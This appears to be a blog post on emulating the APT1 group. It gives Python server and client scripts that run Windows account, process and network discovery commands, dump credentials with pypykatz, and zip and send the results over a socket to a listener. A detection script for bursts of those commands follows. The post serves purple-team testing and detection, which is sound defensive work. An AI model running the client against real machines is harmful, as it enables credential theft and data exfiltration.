24.11.2022
Tested on Windows 10
Information from Mitre ATT&CK regarding the APT1 group is as follows:
APT1 used the commands net localgroup, net user, and net group to find accounts on the system.
APT1 has used RAR to compress files before moving them outside of the victim network.
APT1 used a batch script to perform a series of discovery techniques and saved the results to a text file.
APT1 has collected files from a local victim.
APT1 listed connected network shares.
APT1 has been known to use credential dumping using Mimikatz.
APT1 gathered a list of running processes on the system using tasklist /v.
APT1 used the ipconfig /all command to gather network configuration information.
APT1 used the net use command to get a listing on network connections.
APT1 used the commands net start and tasklist to get a listing of the services on the system.
git clone https://github.com/anil-yelken/APT-Simulator
First, start apt1_server.py on the server machine. Then start apt1.py on the victim machine.
apt1_server.py
import socket

# Listen on all interfaces, port 80, and accept a single client.
s = socket.socket()
s.bind(("0.0.0.0", 80))
s.listen()
client_socket, address = s.accept()
print(f"[+] {address} is connected.")

# Write everything the client sends into received_file.zip until it closes the connection.
with open("received_file.zip", "wb") as f:
    while True:
        bytes_read = client_socket.recv(4096)
        if not bytes_read:
            break
        f.write(bytes_read)

client_socket.close()
s.close()
apt1_client.py
import subprocess
import os
import zipfile
import socket

# Each discovery command is run through cmd.exe and its output is saved to a .txt file.
# Failures are ignored so that the remaining steps still run.
try:
    localgroup = subprocess.check_output("net localgroup", shell=True)
    with open("localgroup.txt", 'wb') as file:
        file.write(localgroup)
except Exception:
    pass

try:
    user = subprocess.check_output("net user", shell=True)
    with open("user.txt", 'wb') as file:
        file.write(user)
except Exception:
    pass

try:
    group = subprocess.check_output("net group", shell=True)
    with open("group.txt", 'wb') as file:
        file.write(group)
except Exception:
    pass

try:
    tasklist = subprocess.check_output("tasklist /v", shell=True)
    with open("tasklist.txt", 'wb') as file:
        file.write(tasklist)
except Exception:
    pass

try:
    netuse = subprocess.check_output("net use", shell=True)
    with open("netuse.txt", 'wb') as file:
        file.write(netuse)
except Exception:
    pass

try:
    netstart = subprocess.check_output("net start", shell=True)
    with open("netstart.txt", 'wb') as file:
        file.write(netstart)
except Exception:
    pass

try:
    ipconfig = subprocess.check_output("ipconfig /all", shell=True)
    with open("ipconfig.txt", 'wb') as file:
        file.write(ipconfig)
except Exception:
    pass

# Credential dumping step (simulates the Mimikatz usage attributed to APT1).
try:
    os.system("pip3 install pypykatz")
except Exception:
    pass

try:
    os.system("pypykatz.py rekall dump -t 0")
    print("pypykatz is finished.")
except Exception:
    pass

# Compress every .txt file under the current directory, then send the archive to the server.
try:
    file_zip = zipfile.ZipFile('file.zip', 'w')
    for folder, subfolders, files in os.walk('.'):
        for file in files:
            if file.endswith('.txt'):
                file_zip.write(os.path.join(folder, file),
                               os.path.relpath(os.path.join(folder, file), '.'),
                               compress_type=zipfile.ZIP_DEFLATED)
    file_zip.close()
    print("Files are compressed.")

    s = socket.socket()
    # 127.0.0.1 only works when server and client run on the same host;
    # use the server machine's address when testing across two machines.
    s.connect(("127.0.0.1", 80))
    with open("file.zip", "rb") as f:
        while True:
            bytes_read = f.read(4096)
            if not bytes_read:
                break
            s.sendall(bytes_read)
    s.close()
    print("Zip file sent.")
except Exception:
    pass
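The point of running a simulator like this is to check whether the resulting telemetry is caught. The script below is an added example written for this post, not code from the APT-Simulator project: it takes process-creation events and flags a parent process that launches several distinct APT1-style discovery commands (the net, tasklist and ipconfig commands listed above) within a short window. The log format is a constructed pipe-separated line per event, the hostnames, PIDs and timestamps are made up, and the ATT&CK technique labels are my own mapping rather than something the post states. Because the client runs each command with shell=True, what a sensor such as Sysmon Event ID 1 or Security 4688 (with command-line auditing) records is a cmd.exe launched by python.exe with "/c <command>", so the detector unwraps that and groups by the parent process.

```python
"""Flag bursts of APT1-style discovery commands in process-creation events.

Added example for this post, not part of the APT-Simulator project.
Input: one constructed pipe-separated line per process-creation event:
    timestamp|host|parent_pid|parent_image|image|command_line
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Discovery commands the post attributes to APT1. The ATT&CK labels are this
# example's own mapping (assumption), not something the post provides.
DISCOVERY_PATTERNS = [
    (re.compile(r"^net1?\s+(?:localgroup|user|group)\b"), "T1087 Account Discovery"),
    (re.compile(r"^tasklist\s+/v\b"), "T1057 Process Discovery"),
    (re.compile(r"^ipconfig\s+/all\b"), "T1016 System Network Configuration Discovery"),
    (re.compile(r"^net1?\s+use\b"), "T1049 System Network Connections Discovery"),
    (re.compile(r"^net1?\s+start\b"), "T1007 System Service Discovery"),
]

# 'cmd.exe /c <command>' wrapper produced by subprocess.check_output(..., shell=True)
CMD_WRAPPER = re.compile(r'^"?(?:[a-z]:\\[^"]*\\)?cmd(?:\.exe)?"?\s+/[ck]\s+', re.I)
# Leading drive/directory, optional quotes and .exe around the program token
EXE_PREFIX = re.compile(r'^"?(?:[a-z]:\\[^"\s]*\\)?([a-z0-9_]+)(?:\.exe)?"?', re.I)


def normalize(cmdline):
    """Unwrap 'cmd /c', strip path and .exe from the program, squeeze spaces, lower-case."""
    c = CMD_WRAPPER.sub("", cmdline.strip())
    c = EXE_PREFIX.sub(lambda m: m.group(1), c, count=1)
    return re.sub(r"\s+", " ", c).lower()


def classify(cmdline):
    """Return the technique label for a discovery command line, or None."""
    norm = normalize(cmdline)
    for pattern, label in DISCOVERY_PATTERNS:
        if pattern.search(norm):
            return label
    return None


def parse_line(line):
    """Parse one constructed log line into a dict."""
    ts, host, ppid, parent, image, cmdline = line.split("|", 5)
    return {"ts": datetime.fromisoformat(ts), "host": host, "ppid": int(ppid),
            "parent": parent, "image": image, "cmdline": cmdline}


def detect_discovery_bursts(lines, window_seconds=60, min_techniques=3):
    """One alert per (host, parent pid, parent image) that runs >= min_techniques
    distinct discovery techniques inside any window of window_seconds."""
    groups = defaultdict(list)
    for line in lines:
        if not line.strip():
            continue
        ev = parse_line(line)
        label = classify(ev["cmdline"])
        if label:
            groups[(ev["host"], ev["ppid"], ev["parent"])].append((ev["ts"], label))

    window = timedelta(seconds=window_seconds)
    alerts = []
    for (host, ppid, parent), hits in groups.items():
        hits.sort()
        for i, (start, _) in enumerate(hits):
            seen = {label for ts, label in hits[i:] if ts - start <= window}
            if len(seen) >= min_techniques:
                alerts.append({"host": host, "ppid": ppid, "parent": parent,
                               "first_seen": start, "techniques": sorted(seen)})
                break  # one alert per parent process is enough
    return alerts


# Constructed sample: WS01 shows the simulator's sequence (cmd.exe spawned by python.exe
# for every command); WS02 shows an administrator running two commands an hour apart.
SAMPLE_LOG = r"""
2022-11-24T10:00:01|WS01|4120|C:\Python310\python.exe|C:\Windows\System32\cmd.exe|C:\Windows\system32\cmd.exe /c net localgroup
2022-11-24T10:00:02|WS01|4120|C:\Python310\python.exe|C:\Windows\System32\cmd.exe|C:\Windows\system32\cmd.exe /c net user
2022-11-24T10:00:02|WS01|4120|C:\Python310\python.exe|C:\Windows\System32\cmd.exe|C:\Windows\system32\cmd.exe /c net group
2022-11-24T10:00:03|WS01|4120|C:\Python310\python.exe|C:\Windows\System32\cmd.exe|"C:\Windows\system32\cmd.exe" /c tasklist /v
2022-11-24T10:00:04|WS01|4120|C:\Python310\python.exe|C:\Windows\System32\cmd.exe|C:\Windows\system32\cmd.exe /c net use
2022-11-24T10:00:04|WS01|4120|C:\Python310\python.exe|C:\Windows\System32\cmd.exe|C:\Windows\system32\cmd.exe /c net start
2022-11-24T10:00:05|WS01|4120|C:\Python310\python.exe|C:\Windows\System32\cmd.exe|C:\Windows\system32\cmd.exe /c ipconfig /all
2022-11-24T10:03:00|WS02|1544|C:\Windows\explorer.exe|C:\Windows\System32\cmd.exe|"C:\Windows\System32\cmd.exe"
2022-11-24T10:03:20|WS02|7788|C:\Windows\System32\cmd.exe|C:\Windows\System32\ipconfig.exe|ipconfig /all
2022-11-24T11:15:00|WS02|7788|C:\Windows\System32\cmd.exe|C:\Windows\System32\net.exe|net use
"""

if __name__ == "__main__":
    for alert in detect_discovery_bursts(SAMPLE_LOG.splitlines()):
        print(f"[!] {alert['host']} pid {alert['ppid']} ({alert['parent']}) "
              f"from {alert['first_seen']}: {', '.join(alert['techniques'])}")
```

Grouping on the parent rather than on each net.exe/tasklist.exe child matters here: the simulator starts a fresh cmd.exe for every command, so only the python.exe parent ties the sequence together. On the sample input WS01 trips the rule with five distinct techniques in four seconds, while the lone ipconfig /all and net use on WS02 do not; tuning window_seconds and min_techniques against your own admin activity is the usual next step before turning this into a SIEM rule.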